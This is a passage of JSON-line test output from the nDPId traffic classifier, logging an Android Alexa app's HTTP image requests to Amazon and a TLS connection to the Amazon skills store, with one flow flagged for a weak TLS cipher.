{"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/71GcCNTb6kL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2055,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":124,"flow_packet_id":2,"flow_last_seen":1490976134237,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976134237,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPIGPkc0VD84rBAq2ABQyxaJEqCkMupghaAScSCurAAAAgQFtAQCCAps+nR5APZytgEDAwg="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2056,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":124,"flow_packet_id":3,"flow_last_seen":1490976134238,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976134238,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0EjNAAEAG3hysECrYNFQ\/OMsWAFAy6mCFiRKgpYAQAVdNOgAAAQEICgD2cr9s+nR5"} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2057,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976134149,"flow_last_seen":1490976134239,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976134239,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51990,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/612xlaOI2NL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2236,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976136930,"flow_last_seen":1490976136930,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976136930,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40871,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2236,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":125,"flow_packet_id":1,"flow_last_seen":1490976136930,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976136930,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8bqFAAEAGoEasECrYNu8d\/Z+nAbuZbx1qAAAAAKAC\/\/9PLQAAAgQFtAQCCAoA9nPLAAAAAAEDAwg="} 
+00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2237,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":125,"flow_packet_id":2,"flow_last_seen":1490976137042,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976137042,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwrQVAAOcGuu027x39rBAq2AG7n6dEArKimW8da3ASH\/7pVAAAAgQFtAEDAwY="} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2238,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":125,"flow_packet_id":3,"flow_last_seen":1490976137043,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976137043,"pkt":"AMDKkaPvePiC0\/vCCABFAAAobqJAAEAGoFmsECrYNu8d\/Z+nAbuZbx1rRAKyo1AQAVczxgAA"} +00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2239,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976136930,"flow_last_seen":1490976137044,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1490976137044,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40871,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
+01026{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2241,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976136930,"flow_last_seen":1490976137222,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":328,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976137222,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40871,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2274,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976139642,"flow_last_seen":1490976139642,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976139642,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51992,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2274,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":126,"flow_packet_id":1,"flow_last_seen":1490976139642,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976139642,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8ooBAAEAGTcesECrYNFQ\/OMsYAFAytNZaAAAAAKAC\/\/+zQgAAAgQFtAQCCAoA9nTaAAAAAAEDAwg="} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2275,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976139643,"flow_last_seen":1490976139643,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976139643,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51993,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2275,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":127,"flow_packet_id":1,"flow_last_seen":1490976139643,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976139643,"pkt":"AMDKkaPvePiC0\/vCCABFAAA82RlAAEAGFy6sECrYNFQ\/OMsZAFDfya3CAAAAAKAC\/\/8uwwAAAgQFtAQCCAoA9nTbAAAAAAEDAwg="} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2276,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976139643,"flow_last_seen":1490976139643,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976139643,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51994,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2276,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":128,"flow_packet_id":1,"flow_last_seen":1490976139643,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976139643,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8ao9AAEAGhbisECrYNFQ\/OMsaAFCdOh5UAAAAAKAC\/\/8AwAAAAgQFtAQCCAoA9nTbAAAAAAEDAwg="} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2277,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976139643,"flow_last_seen":1490976139643,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976139643,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51995,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2277,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":129,"flow_packet_id":1,"flow_last_seen":1490976139643,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976139643,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8ziFAAEAGIiasECrYNFQ\/OMsbAFAzpLr6AAAAAKAC\/\/\/NrgAAAgQFtAQCCAoA9nTbAAAAAAEDAwg="} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2278,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976139643,"flow_last_seen":1490976139643,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976139643,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51996,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2278,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":130,"flow_packet_id":1,"flow_last_seen":1490976139643,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976139643,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8c6xAAEAGfJusECrYNFQ\/OMscAFApFQd3AAAAAKAC\/\/+LwAAAAgQFtAQCCAoA9nTbAAAAAAEDAwg="} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2279,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976139643,"flow_last_seen":1490976139643,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976139643,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51997,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2279,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":131,"flow_packet_id":1,"flow_last_seen":1490976139643,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976139643,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8MrZAAEAGvZGsECrYNFQ\/OMsdAFCU10ZqAAAAAKAC\/\/\/hCAAAAgQFtAQCCAoA9nTcAAAAAAEDAwg="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2280,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":126,"flow_packet_id":2,"flow_last_seen":1490976139667,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976139667,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPIGPkc0VD84rBAq2ABQyxh7572AMrTWW6AScSAgygAAAgQFtAQCCAps+nrkAPZ02gEDAwg="} 
+00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2281,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":126,"flow_packet_id":3,"flow_last_seen":1490976139669,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976139669,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0ooFAAEAGTc6sECrYNFQ\/OMsYAFAytNZbe+e9gYAQAVe\/XAAAAQEICgD2dN5s+nrk"} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2282,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976139642,"flow_last_seen":1490976139669,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976139669,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51992,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/71nqwmwmRlL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2283,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":128,"flow_packet_id":2,"flow_last_seen":1490976139674,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976139674,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPIGPkc0VD84rBAq2ABQyxrjsd\/DnToeVaAScSDohQAAAgQFtAQCCAps+naYAPZ02wEDAwg="} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2284,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":129,"flow_packet_id":2,"flow_last_seen":1490976139674,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976139674,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPIGPkc0VD84rBAq2ABQyxtRO\/n\/M6S6+6AScSAtRgAAAgQFtAQCCAps+ncBAPZ02wEDAwg="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2285,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":127,"flow_packet_id":2,"flow_last_seen":1490976139674,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976139674,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPIGPkc0VD84rBAq2ABQyxlSuJ7038mtw6AScSDlMAAAAgQFtAQCCAps+nm5APZ02wEDAwg="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2286,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":130,"flow_packet_id":2,"flow_last_seen":1490976139674,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976139674,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPIGPkc0VD84rBAq2ABQyxx\/FDN0KRUHeKAScSCFPAAAAgQFtAQCCAps+nXPAPZ02wEDAwg="} 
+00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2287,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":128,"flow_packet_id":3,"flow_last_seen":1490976139677,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976139677,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0apBAAEAGhb+sECrYNFQ\/OMsaAFCdOh5V47HfxIAQAVeHGAAAAQEICgD2dN9s+naY"} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2288,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":129,"flow_packet_id":3,"flow_last_seen":1490976139677,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976139677,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0ziJAAEAGIi2sECrYNFQ\/OMsbAFAzpLr7UTv6AIAQAVfL2AAAAQEICgD2dN9s+ncB"} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2289,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":127,"flow_packet_id":3,"flow_last_seen":1490976139677,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976139677,"pkt":"AMDKkaPvePiC0\/vCCABFAAA02RpAAEAGFzWsECrYNFQ\/OMsZAFDfya3DUrie9YAQAVeDwwAAAQEICgD2dN9s+nm5"} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2290,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":130,"flow_packet_id":3,"flow_last_seen":1490976139678,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976139678,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0c61AAEAGfKKsECrYNFQ\/OMscAFApFQd4fxQzdYAQAVcjzwAAAQEICgD2dN9s+nXP"} 
+01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2291,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976139643,"flow_last_seen":1490976139678,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976139678,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51994,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/315y9IEXZSL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2292,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976139643,"flow_last_seen":1490976139678,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976139678,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51995,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/5100jxqrQhL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 
Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2293,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976139643,"flow_last_seen":1490976139678,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976139678,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51993,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/61SZU-lPFNL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2294,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976139643,"flow_last_seen":1490976139678,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976139678,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51996,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/81Ni5COup-L._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2295,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":131,"flow_packet_id":2,"flow_last_seen":1490976139711,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976139711,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPIGPkc0VD84rBAq2ABQyx1XQZuRlNdGa6AScSCQFAAAAgQFtAQCCAps+n\/1APZ03AEDAwg="} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2296,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":131,"flow_packet_id":3,"flow_last_seen":1490976139713,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976139713,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0MrdAAEAGvZisECrYNFQ\/OMsdAFCU10ZrV0GbkoAQAVcupAAAAQEICgD2dONs+n\/1"} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2297,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976139643,"flow_last_seen":1490976139714,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976139714,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51997,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": 
